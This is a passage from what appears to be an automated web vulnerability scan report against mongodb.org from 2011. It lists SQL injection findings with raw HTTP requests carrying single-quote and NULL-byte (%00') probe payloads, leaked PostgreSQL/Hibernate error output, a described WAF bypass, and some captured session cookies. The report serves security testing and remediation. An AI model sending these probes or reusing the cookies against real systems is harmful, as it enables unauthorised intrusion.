Host: www.mongodb.org

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /s/1627/3/1.0/_%2527%2527/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 2

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=UTF-8
Date: Wed, 05 Oct 2011 20:50:39 GMT
X-xgen-cache: yes
X-Cache-Info: caching
Content-Length: 2285

<html>
<head>
   <link rel="stylesheet" type="text/css" href="/styles/main-action.css" />
   <link rel="stylesheet" type="text/css" href="/includes/css/master.css" />
   <link rel="stylesheet" type="text/cs
...[SNIP]...

1.31. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:43 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.32. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles'/confluence.macros.profile:profile-macro-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:44 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.33. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.web.resources:comments/confluence.web.resources:comments.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:44 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.34. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:comments'/confluence.web.resources:comments.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:46 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.35. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:09 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.36. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch'/confluence.web.resources:contentnamesearch.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:10 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.37. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:12 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.38. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles'/confluence.web.resources:master-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:13 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.39. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css?media=print HTTP/1.1
Host: www.mongodb.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.mongodb.org/dosearchsite.action?queryString=xss&where=DOCS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-903498723-1317847440961; __sid=f958052587ceea881f0f6613baa6bca1affdc622; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.2136194057.1317847505.1317847505.1317847505.1; __utmb=266042259.1.10.1317847505; __utmc=266042259; __utmz=266042259.1317847505.1.1.utmcsr=blog.mongodb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1317847440676-16815; WRUID=0; JSESSIONID=ECAABD73E2AD3E5DC62FD99815D51753

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:45:57 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.40. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles'/confluence.web.resources:print-styles.css?media=print HTTP/1.1
Host: www.mongodb.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.mongodb.org/dosearchsite.action?queryString=xss&where=DOCS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-903498723-1317847440961; __sid=f958052587ceea881f0f6613baa6bca1affdc622; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.2136194057.1317847505.1317847505.1317847505.1; __utmb=266042259.1.10.1317847505; __utmc=266042259; __utmz=266042259.1317847505.1.1.utmcsr=blog.mongodb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1317847440676-16815; WRUID=0; JSESSIONID=ECAABD73E2AD3E5DC62FD99815D51753

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:45:59 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.41. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.web.resources:userlink/confluence.web.resources:userlink.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:17 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.42. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink'/confluence.web.resources:userlink.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:19 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.43. http://www.mongodb.org/s/1627/3/136/_/styles/colors.css [spaceKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/136/_/styles/colors.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/136/_/styles/colors.css?spaceKey=DOCS%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 20:50:28 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00<br>
...[SNIP]...

1.44. http://www.mongodb.org/s/1627/3/136/_/styles/combined.css [spaceKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/136/_/styles/combined.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/136/_/styles/combined.css?spaceKey=DOCS%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2011 20:50:26 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00
   org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:110)
...[SNIP]...

1.45. http://www.mongodb.org/s/1627/3/136/_/styles/custom.css [spaceKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/136/_/styles/custom.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/136/_/styles/custom.css?spaceKey=DOCS%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 20:50:28 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
